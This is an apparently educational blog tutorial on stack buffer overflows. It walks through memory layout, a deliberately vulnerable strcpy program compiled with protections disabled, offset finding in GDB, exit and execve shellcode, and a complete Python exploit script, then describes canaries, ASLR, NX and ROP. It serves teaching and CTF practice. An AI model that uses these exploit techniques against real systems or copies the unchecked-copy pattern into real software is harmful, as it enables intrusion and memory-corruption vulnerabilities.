Ethical Hacking #buffer overflow#binary exploitation#pwn

Buffer Overflows Explained: From Concept to Beginner Exploit

Understand buffer overflows: memory layout, stack-based exploitation, shellcode basics, and practical gdb debugging techniques.

April 3, 2026 12 min read

Buffer overflow attacks are some of the oldest yet most fundamental security vulnerabilities. While modern operating systems have added protections (ASLR, stack canaries, DEP), understanding buffer overflows is essential for mastering low-level security concepts and binary exploitation.

This article explains the mechanics, walks through a simple vulnerable program, and shows how attackers exploit it.

What Is a Buffer Overflow?

A buffer overflow occurs when a program writes more data to a buffer than it can hold, overwriting adjacent memory. This can corrupt data, crash the program, or execute arbitrary code.

Simple example:

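#include <string.h>

int main(int argc, char *argv[]) {
    char buffer[10];              // 10-byte buffer
    if (argc < 2) return 1;       // Need one argument as user input
    strcpy(buffer, argv[1]);      // Copy user input with no length check
    return 0;
}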

If the input is 20 characters long, strcpy writes 21 bytes (the characters plus a terminating NUL) into 10 bytes of space. The extra 11 bytes spill into adjacent memory.
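To make the spill concrete, here is a small Python sketch that models memory as a flat byte array. The helper `unchecked_copy` and the `NEIGHBOR-DATA` contents are made up for illustration; real process memory is not a Python object, but the overwrite pattern is the same.

```python
def unchecked_copy(memory: bytearray, start: int, data: bytes) -> None:
    """Mimic strcpy: copy data plus a terminating NUL with no bounds check."""
    for i, byte in enumerate(data + b"\x00"):
        memory[start + i] = byte

# A 10-byte buffer followed directly by 13 bytes of unrelated data.
memory = bytearray(b"." * 10 + b"NEIGHBOR-DATA")
unchecked_copy(memory, 0, b"A" * 20)

buffer, neighbor = bytes(memory[:10]), bytes(memory[10:])
print(buffer)    # b'AAAAAAAAAA'
print(neighbor)  # b'AAAAAAAAAA\x00TA'
```

Only the last two bytes of the neighboring data survive; everything before them was replaced by the overflow and its terminating NUL.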

What gets overwritten depends on memory layout.

Memory Layout (The Foundation)

Understanding where data lives in memory is crucial. A program’s memory is organized as follows:

High Memory Addresses
    ↑
    ├─ [Stack] ← grows downward
    │  ├─ Function arguments (when passed on the stack)
    │  ├─ Return address ← CRITICAL: Where function returns to
    │  ├─ Saved frame pointer
    │  └─ Local variables (buffers live here, below the return address)
    │
    ├─ (unused space)
    │
    ├─ [Heap] ← grows upward
    │  └─ Dynamically allocated memory
    │
    ├─ [BSS Segment]
    │  └─ Uninitialized global/static variables
    │
    ├─ [Data Segment]
    │  └─ Initialized global/static variables
    │
    └─ [Code/Text]
       └─ Program instructions

Low Memory Addresses

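Critical insight: The return address is stored on the stack, at a higher address than the function's local variables. A buffer fills from low addresses toward high ones, so if we overflow a buffer on the stack, we can overwrite the return address.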

Stack-Based Buffer Overflow

This is the classic type and the usual starting point. When a function returns, the ret instruction pops the return address off the stack and jumps there. If we overwrite that address with the address of our own code, we redirect execution.
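The redirect can be sketched with a toy stack frame in Python. The layout here (20-byte buffer, 8-byte saved frame pointer, 8-byte return address, no padding) and every address are assumptions for illustration; a real compiler may add padding, so real offsets must be measured.

```python
import struct

# Toy frame layout, assumed for illustration (real layouts may add padding):
# [ 20-byte buffer ][ 8-byte saved frame pointer ][ 8-byte return address ]
BUF_SIZE, FP_SIZE = 20, 8
RET_OFFSET = BUF_SIZE + FP_SIZE

def make_frame(return_address: int) -> bytearray:
    frame = bytearray(BUF_SIZE)                   # buffer at the lowest addresses
    frame += struct.pack("<Q", 0x7FFFFFFFE000)    # made-up saved frame pointer
    frame += struct.pack("<Q", return_address)    # where the function should return
    return frame

def return_target(frame: bytearray) -> int:
    """What a `ret` would jump to: the 8 bytes stored at RET_OFFSET."""
    return struct.unpack_from("<Q", frame, RET_OFFSET)[0]

frame = make_frame(0x401196)                      # hypothetical legitimate caller
before = return_target(frame)

# Overflow: fill the buffer and saved frame pointer, then supply a new address.
payload = b"A" * RET_OFFSET + struct.pack("<Q", 0x424242424242)
frame[0:len(payload)] = payload
after = return_target(frame)

print(hex(before), "->", hex(after))  # 0x401196 -> 0x424242424242
```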

Vulnerable Program Example

#include <stdio.h>
#include <string.h>

void vulnerable_function(char *input) {
    char buffer[20];
    strcpy(buffer, input);  // VULNERABLE: No bounds checking
    printf("You entered: %s\n", buffer);
}

int main(int argc, char *argv[]) {
    if (argc < 2) {
        printf("Usage: %s <input>\n", argv[0]);
        return 1;
    }
    vulnerable_function(argv[1]);
    printf("Program completed successfully\n");
    return 0;
}

Save as vulnerable.c and compile (disable protections for learning):

gcc -fno-stack-protector -z execstack -no-pie vulnerable.c -o vulnerable
# -fno-stack-protector: Disable stack canary
# -z execstack: Make stack executable
# -no-pie: Load the code at a fixed address (matches the checksec output "PIE: No")

Normal Execution

./vulnerable "hello"
You entered: hello
Program completed successfully

Buffer Overflow - Crash

Input long enough to run past the 20-byte buffer and reach the saved return address causes a crash:

./vulnerable "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
You entered: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)

The extra ‘A’s overwrite the return address so that it points to invalid memory, and the program crashes when the function returns.

Finding the Offset

To exploit this, we need to know:

Buffer size: 20 bytes
Offset to return address: How many bytes before we reach the return address?

Use GDB (debugger) to find it:

gdb ./vulnerable
(gdb) run $(python3 -c "print('A'*30)")

The program crashes. Print a backtrace:

(gdb) bt
#0  0x41414141 in ?? ()
#1  0x00007fff... in ?? ()

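The 0x41414141 (hex for ‘AAAA’) shows the return address is overwritten with ‘A’s. On x86-64, a return address made entirely of ‘A’s (0x4141414141414141) is non-canonical, so the fault is reported at the ret instruction itself and the overwritten value sits at the top of the stack; inspect it with x/gx $rsp.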
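Turning a register value back into the bytes that were in memory is a one-liner. This sketch assumes a little-endian target (true for x86 and x86-64); `decode_register` is a hypothetical helper name.

```python
def decode_register(value: int, width: int = 4) -> bytes:
    """Return the bytes as they sat in memory (x86 is little-endian)."""
    return value.to_bytes(width, "little")

print(decode_register(0x41414141))  # b'AAAA'
print(decode_register(0x44434241))  # b'ABCD': the lowest byte comes first in memory
```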

Determining exact offset:

Create a pattern that’s easier to locate:

python3 -c "import string; import itertools; \
  s = ''.join(''.join(p) for p in itertools.product(string.ascii_lowercase, repeat=2)); \
  print(s[:50])"
# Output: aaabacadaeafagahaiajakalamanaoapaqarasatauavawaxay

Run with pattern:

(gdb) run $(python3 -c "import string; import itertools; \
  s = ''.join(''.join(p) for p in itertools.product(string.ascii_lowercase, repeat=2)); \
  print(s[:100])")

Check registers:

(gdb) info registers rsp rip
rip            0x61706b61          0x61706b61

The value in rip comes from our pattern. Decode it as little-endian ASCII and find that substring in the pattern; its index is the offset.
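The lookup can be automated. The sketch below regenerates the same two-letter pattern and searches it for the bytes of a register value. The names `make_pattern` and `find_offset` are hypothetical, and `example_value` is constructed from the pattern itself rather than taken from a real debugging session; substitute the value GDB reports.

```python
import itertools
import string

def make_pattern(length: int) -> bytes:
    """Same two-letter pattern as above: aa, ab, ac, ... truncated to length."""
    pairs = itertools.product(string.ascii_lowercase, repeat=2)
    return "".join("".join(p) for p in pairs)[:length].encode()

def find_offset(register_value: int, pattern: bytes, width: int = 4) -> int:
    """Index of the register's bytes inside the pattern, or -1 if absent."""
    needle = register_value.to_bytes(width, "little")  # undo the little-endian load
    return pattern.find(needle)

pattern = make_pattern(100)
# Hypothetical register value: pretend the 4 bytes at index 28 ended up in rip.
example_value = int.from_bytes(pattern[28:32], "little")
print(find_offset(example_value, pattern))  # 28
```

A return value of -1 means the register did not receive pattern bytes, which usually indicates the input was too short to reach the return address.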

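Simpler approach: Use trial and error, lengthening the input until the crash address starts to reflect your bytes.

24 bytes: Crash with offset near answer
28 bytes: Return address overwritten
32 bytes: Confirmed offset

Through testing, the offset on this build is 28 bytes. The value depends on the compiler, flags, and architecture, so measure it on your own binary.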

Crafting the Exploit

Now that we know the offset, we can control the return address.

python3 << 'EOF'
import sys
# 28 bytes of padding + 8 bytes for return address (64-bit)
offset = 28
return_address = 0x0000555555554999  # Address of injected code
payload = b'A' * offset + return_address.to_bytes(8, 'little')
sys.stdout.buffer.write(payload)  # Write raw bytes; print() would emit the b'...' repr
EOF

But where does the return address point?

Without ASLR and DEP, the shellcode can go on the stack itself.
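One practical detail: a 64-bit user-space address packs to 8 bytes whose top two are NUL, and strcpy stops at the first NUL. The sketch below models what actually lands in the return-address slot. The address, the original slot contents, and the helper `strcpy_copies` are assumptions for illustration.

```python
import struct

def strcpy_copies(payload: bytes) -> bytes:
    """Bytes strcpy would write: everything before the first NUL, plus one NUL."""
    return payload.split(b"\x00", 1)[0] + b"\x00"

offset = 28
address = 0x7FFFFFFFE3E8                 # hypothetical stack address
packed = struct.pack("<Q", address)      # b'\xe8\xe3\xff\xff\xff\x7f\x00\x00'

payload = b"A" * offset + packed
written = strcpy_copies(payload)

# Model the 8-byte return-address slot, which held a user-space address
# (top two bytes already zero) before the overflow.
slot = bytearray(struct.pack("<Q", 0x401196))
tail = written[offset:]                  # the bytes that land on the slot
slot[:len(tail)] = tail
print(hex(struct.unpack("<Q", slot)[0])) # 0x7fffffffe3e8
```

The copy ends after six address bytes and one NUL, yet the slot still holds the full address because its upper bytes were zero to begin with. Anything placed after the address in the payload would never be copied.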

Shellcode

Shellcode is machine code that executes a shell or other commands. For x86-64 Linux:

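; Minimal exit(0) shellcode
mov rax, 60    ; syscall number for exit
xor edi, edi   ; exit code = 0
syscall

; In hex: 48c7c03c000000 (mov) + 31ff (xor) + 0f05 (syscall)
; Total: \x48\xc7\xc0\x3c\x00\x00\x00\x31\xff\x0f\x05
; Note: the \x00 bytes end a strcpy copy early. A NUL-free equivalent is
; push 60 / pop rax / xor edi, edi / syscall: \x6a\x3c\x58\x31\xff\x0f\x05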

More useful: execve syscall (spawn /bin/sh):

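; execve("/bin/sh", NULL, NULL) syscall
; binsh is the label of a NUL-terminated "/bin/sh" string stored with the code
mov rax, 59          ; syscall number for execve
lea rdi, [rel binsh] ; rdi = pointer to the "/bin/sh" string
xor rsi, rsi         ; argv = NULL
xor rdx, rdx         ; envp = NULL
syscall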

; Precomputed: \x48\xc7\xc0\x3b\x00\x00\x00\x48\x8d\x3d\x0e\x00\x00\x00...
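Before delivering shellcode through a string function, it helps to scan it for bytes the delivery path cannot carry. The sketch below assumes NUL is the only bad byte, which fits strcpy and command-line arguments; `bad_byte_positions` is a hypothetical helper, and the second byte string is a NUL-free variant (push 60; pop rax; xor edi, edi; syscall) of the exit example.

```python
def bad_byte_positions(shellcode: bytes, bad: bytes = b"\x00") -> list:
    """Indexes of bytes that the delivery method cannot carry."""
    return [i for i, b in enumerate(shellcode) if b in bad]

# mov rax, 60 ; xor edi, edi ; syscall
mov_version = bytes.fromhex("48c7c03c000000" "31ff" "0f05")
# push 60 ; pop rax ; xor edi, edi ; syscall
push_pop_version = bytes.fromhex("6a3c58" "31ff" "0f05")

print(bad_byte_positions(mov_version))       # [4, 5, 6]
print(bad_byte_positions(push_pop_version))  # []
```

Other input routines have different bad bytes (a newline for line-based readers, for instance), so the `bad` argument would change with the target.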

Finding Protections

Before exploiting, check what protections are enabled:

checksec --file=vulnerable
    Arch:     amd64-64-bit
    RELRO:    Partial
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No
    RWX:      Has RWX segments

Stack: No canary found: Good for the attacker. The overflow is not detected.
NX: NX disabled: Good for the attacker. The stack is executable.
PIE: No: Good for the attacker. Code addresses are predictable.

In a real program with modern protections, exploitation is much harder.
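As a rough illustration of what one of these checks looks at, the PIE result can be approximated by reading the `e_type` field of the ELF header. This is only a sketch of a single check, not how checksec is implemented; the function name and the synthetic header are assumptions, and shared libraries are also marked ET_DYN.

```python
import struct

ET_EXEC, ET_DYN = 2, 3   # e_type values from the ELF specification

def is_position_independent(elf_header: bytes) -> bool:
    """True when e_type is ET_DYN, which is how PIE executables are marked."""
    if elf_header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    byte_order = "<" if elf_header[5] == 1 else ">"   # EI_DATA: 1 = little-endian
    (e_type,) = struct.unpack_from(byte_order + "H", elf_header, 16)
    return e_type == ET_DYN

# Synthetic 18-byte header for a 64-bit little-endian ET_EXEC file.
fake_header = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8) + struct.pack("<H", ET_EXEC)
print(is_position_independent(fake_header))  # False

# On a real file (path is an assumption):
# with open("./vulnerable", "rb") as f:
#     print(is_position_independent(f.read(18)))
```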

Complete Exploit Example

Given the vulnerable program and our analysis:

#!/usr/bin/env python3
import subprocess

offset = 28  # Bytes to return address (verify on your own build)
shell_addr = 0x7ffffffde000 + 1000  # Approximate stack address (without ASLR)

# NUL-free exit(0) shellcode (demo): push 60; pop rax; xor edi, edi; syscall
shellcode = b'\x6a\x3c\x58\x31\xff\x0f\x05'

# Shellcode + padding up to the offset + return address pointing to the shellcode.
# Only the 6 non-zero address bytes are sent: argv strings and strcpy both stop at
# a NUL byte, and the top two bytes of a user-space return address are already zero.
payload = shellcode + b'A' * (offset - len(shellcode)) + shell_addr.to_bytes(8, 'little')[:6]

# Run vulnerable program with payload
result = subprocess.run(['./vulnerable', payload], capture_output=True)
print(result.stdout.decode(errors='replace'))  # Output contains non-UTF-8 bytes
print(result.stderr.decode(errors='replace'))

If successful, the program exits cleanly with status 0 (our exit syscall ran) instead of segfaulting. Swapping in execve shellcode would launch a shell instead.

Modern Protections (Why This Doesn’t Work in Real Programs)

1. Stack Canary

A random value placed between the local buffers and the return address. If it has changed when the function returns, the program terminates:

// Compiled with -fstack-protector (default in modern systems)
void function(const char *input) {
    char buffer[20];
    // Compiler adds: uint64_t canary = __stack_chk_guard;
    strcpy(buffer, input);
    // Compiler adds: if (canary != __stack_chk_guard) __stack_chk_fail();
}

Overflow the buffer, and the canary check fails before return.
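The check can be modeled in a few lines of Python. This is a toy simulation under an assumed layout (20-byte buffer with an 8-byte canary directly above it), not the compiler's actual code; `call_with_canary` is a hypothetical name.

```python
import os

BUF_SIZE, CANARY_SIZE = 20, 8   # toy layout, assumed for illustration

def call_with_canary(user_input: bytes) -> str:
    guard = os.urandom(CANARY_SIZE)                 # random secret the attacker cannot guess
    frame = bytearray(BUF_SIZE) + bytearray(guard)  # buffer, then the canary above it
    frame[0:len(user_input)] = user_input           # unchecked copy, may run past the buffer
    if bytes(frame[BUF_SIZE:BUF_SIZE + CANARY_SIZE]) != guard:
        return "stack smashing detected"            # real code calls __stack_chk_fail
    return "returned normally"

print(call_with_canary(b"hello"))     # returned normally
print(call_with_canary(b"A" * 28))    # stack smashing detected
```

Because the canary sits between the buffer and the return address, a linear overflow cannot reach the return address without changing the canary first.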

2. Address Space Layout Randomization (ASLR)

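Stack, heap, and library addresses are randomized on each run (code addresses too, for PIE binaries):

for i in {1..5}; do
  grep stack /proc/self/maps   # Each grep is a new process printing its own stack mapping
done
# Different addresses each run
# (GDB disables ASLR for programs it starts by default, so check outside the debugger)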

Without knowing the stack address, returning to shellcode is unreliable: the attacker needs an information leak or has to guess.
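To compare stack locations across runs programmatically, the `[stack]` line of a maps listing can be parsed as below. The two sample lines are made up to stand in for separate runs with ASLR enabled; `stack_range` is a hypothetical helper.

```python
def stack_range(maps_text: str):
    """Return (start, end) of the [stack] mapping from /proc/<pid>/maps text."""
    for line in maps_text.splitlines():
        if line.rstrip().endswith("[stack]"):
            start, end = line.split()[0].split("-")
            return int(start, 16), int(end, 16)
    return None

# Two made-up samples standing in for two runs with ASLR enabled.
run_1 = "7ffc1a2b3000-7ffc1a2d4000 rw-p 00000000 00:00 0    [stack]"
run_2 = "7ffe90c11000-7ffe90c32000 rw-p 00000000 00:00 0    [stack]"
for sample in (run_1, run_2):
    start, end = stack_range(sample)
    print(hex(start), hex(end))
```

On Linux, passing `open("/proc/self/maps").read()` gives the range for the current Python process.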

3. Data Execution Prevention (DEP/NX)

Stack is non-executable. Shellcode on the stack won’t run:

checksec --file=vulnerable
NX: NX enabled  # Stack not executable

Injected shellcode is useless here. Attackers instead reuse code that is already executable, for example by chaining ROP gadgets.

Why Learn Buffer Overflows?

Understand memory: Low-level security concepts
CTF competitions: Buffer overflows appear regularly
Legacy systems: Older code lacks protections
Reverse engineering: Recognize overflow patterns
Defense: Know what NOT to do in code

Practical Lab Exercise

Set up a vulnerable program:

# Create vulnerable.c (code above)
gcc -fno-stack-protector -z execstack -no-pie vulnerable.c -o vulnerable

# Use GDB to find offset
gdb ./vulnerable
(gdb) run $(python3 -c "print('A'*100)")
# Crashes; examine the crash site (info registers rip, x/gx $rsp)

# Craft payload: the program reads argv[1], so pass the bytes as an argument
./vulnerable "$(python3 -c "import sys; sys.stdout.buffer.write(b'A'*28 + b'B'*6)")"
# Program crashes with a controlled return address (0x424242424242 if the offset is 28)

Next level (ROP):

With modern protections, use Return-Oriented Programming (ROP):

Chain small code snippets (gadgets) to build new functionality
Tools: ropper, ROPgadget
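A ROP payload is just a sequence of 64-bit values laid out where the return address used to be. The sketch below packs a three-slot chain; every address is a hypothetical placeholder rather than a value from a real binary, and the offset of 28 is carried over from the earlier analysis.

```python
import struct

def p64(value: int) -> bytes:
    """Pack one 64-bit little-endian stack slot."""
    return struct.pack("<Q", value)

# All addresses below are hypothetical placeholders, not from a real binary.
POP_RDI_RET = 0x401233   # gadget: pop rdi; ret
BINSH_STR   = 0x402010   # address of a "/bin/sh" string
SYSTEM_FUNC = 0x401050   # address of system()

offset = 28
# ret -> pop rdi (loads BINSH_STR into rdi) -> ret -> system("/bin/sh")
chain = p64(POP_RDI_RET) + p64(BINSH_STR) + p64(SYSTEM_FUNC)
payload = b"A" * offset + chain
print(len(payload))  # 52
```

Each packed slot contains NUL bytes, so a chain like this needs an input path that accepts them (a raw read, for example) rather than strcpy.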

Conclusion

Buffer overflows are memory corruption vulnerabilities where attackers write beyond allocated buffers and overwrite critical data (return addresses, function pointers, etc.). While modern OSes have mitigated the simplest exploits, understanding buffer overflows is fundamental to binary security.

Most CTFs with a pwn category include at least one overflow challenge. Learn to:

Identify vulnerable code patterns (strcpy, sprintf, gets)
Map memory layout
Calculate offsets
Understand protection mechanisms
Bypass or work around protections

Master buffer overflows, and you’ll understand systems security at its core.

